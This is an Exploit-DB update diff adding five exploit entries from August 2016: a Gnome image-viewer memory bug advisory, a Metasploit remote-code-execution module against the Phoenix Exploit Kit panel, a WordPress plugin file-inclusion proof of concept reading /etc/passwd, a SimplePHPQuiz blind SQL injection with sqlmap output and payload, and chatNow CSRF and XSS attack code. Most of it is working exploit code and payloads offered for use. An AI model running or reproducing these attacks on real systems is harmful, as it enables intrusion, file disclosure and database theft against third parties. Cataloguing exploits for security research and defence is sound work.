DB: 2016-08-24

5 new exploits

Too many to list!

platforms/linux/dos/40291.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Gnome Eye of Gnome Out-of-bounds-write
+# Exploit Author: Kaslov Dmitri
+# Vendor Homepage: https://wiki.gnome.org/Apps/EyeOfGnome
+# Version: 3.10.2
+# Tested on: Ubuntu 14.04 LTS
+# CVE: CVE-2016-6855
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40291.zip
+
+
+Reported: 19-August-2016
+Fixed: 21-Agugst-2016 (fix will go into next software release)
+
+GMarkup requires valid UTF8 input strings and would cause odd
+looking messages if given invalid input. This could also trigger an
+out-of-bounds write in glib before 2.44.1

platforms/php/remote/40294.rb

@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+        Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
+        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
+        then silently installs malware.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'CrashBandicot @DosPerl', #initial discovery
+          'Jay Turla <@shipcod3>', #msf module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '40047' ],
+          [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
+          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 200,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
+          ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Jul 01 2016',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
+      ],self.class)
+  end
+
+  def check
+    test = Rex::Text.rand_text_alpha(8)
+    res = http_send_command("echo #{test};")
+    if res && res.body.include?(test)
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    encoded = Rex::Text.encode_base64(payload.encoded)
+    http_send_command("passthru(base64_decode(\"#{encoded}\"));")
+  end
+
+  def http_send_command(cmd)
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path),
+      'vars_get' => {
+        'bdr' => cmd
+      }
+    })
+  end
+end

platforms/php/webapps/40290.txt

@@ -0,0 +1,31 @@
+[+] Date: [23-8-2016]
+[+] Autor Guillermo Garcia Marcos 
+[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
+[+] Title: Mail Masta WP Local File Inclusion
+[+] info: Local File Inclusion 
+
+The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
+
+Source: /inc/campaign/count_of_send.php
+Line 4: include($_GET['pl']);
+
+Source: /inc/lists/csvexport.php:
+Line 5: include($_GET['pl']);
+
+Source: /inc/campaign/count_of_send.php
+Line 4: include($_GET['pl']);
+
+Source: /inc/lists/csvexport.php
+Line 5: include($_GET['pl']);
+
+Source: /inc/campaign/count_of_send.php
+Line 4: include($_GET['pl']);
+
+
+This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.
+
+
+Typical proof-of-concept would be to load passwd file:
+
+
+http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

platforms/php/webapps/40292.txt

@@ -0,0 +1,75 @@
+# Exploit Title: SimplePHPQuiz - Blind SQL Injection
+# Date: 2016-08-23
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz
+# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip
+# Version: Latest commit
+# Tested on: Debian [wheezy]
+
+
+### Vulnerability
+1-1. Nomal Request
+POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
+Host: 127.0.0.1
+..snip..
+Content-Length: 96
+
+question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
+
+1-2 Response
+   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
+ 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>
+
+2-1 Attack Request 1
+POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
+Host: 127.0.0.1
+..snip..
+Content-Length: 96
+
+question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
+
+2-2 Response
+    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
+ 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>
+
+3-1 Attack Request 2
+POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
+Host: 127.0.0.1
+..snip..
+Content-Length: 96
+
+question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
+
+3-2 Response
+   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
+ 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>
+
+
+### Weak Parameters
+correct_answer parameter
+question parameter
+wrong_answer1 parameter
+wrong_answer2 parameter
+wrong_answer3 parameter
+
+
+### SQLMAP Result
+#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer
+
+...snip...
+
+POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
+sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
+---
+Parameter: correct_answer (POST)
+    Type: AND/OR time-based blind
+    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
+    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
+---
+[17:52:05] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Apache 2.4.10
+
+
+

platforms/php/webapps/40293.txt

@@ -0,0 +1,48 @@
+# Exploit Title: chatNow - Multiple Vulnerabilities
+# Date: 2016-08-23
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: http://chatnow.thiagosf.net/
+# Software Link: https://github.com/thiagosf/chatNow/archive/master.zip
+# Version: Latest commit
+# Tested on: Debian [wheezy]
+
+1. CSRF(Send MSG)
+2. Reflected XSS
+
+========== CSRF VULNERABILITY
+### Vulnerability
+'send_message.php' is not check the csrf token or referer header.
+It is possible CSRF Attack.
+
+### Attack Code
+<form name="csrf_poc" action="http://127.0.0.1/vul_test/chatNow/send_message.php" method="POST">
+<input type="hidden" name="to_user" value="0">
+<input type="hidden" name="scroll_page" value="on">
+<input type="hidden" name="id_user" value="2">
+<input type="hidden" name="message" value="CSRF">
+<input type="hidden" name="reserved" value="false">
+
+<input type="submit" value="Attack!">
+</form>
+
+<script type="text/javascript">document.forms.csrf_poc.submit();</script>
+
+
+========== XSS VULNERABILITY
+### Vulnerability
+This page url is reflected data on page
+It is vulnerable page because not filtered reflected url
+		
+### Attack code
+http://127.0.0.1/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1
+
+### Response
+<div id="box_login">
+		<h2>chatNow</h2>
+	<form action="/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1" method="post">
+		<div class="block_field">
+			<label for="user">Nick</label>
+			<input type="text" name="user" id="user" maxlength="20" /> 
+		</div>
+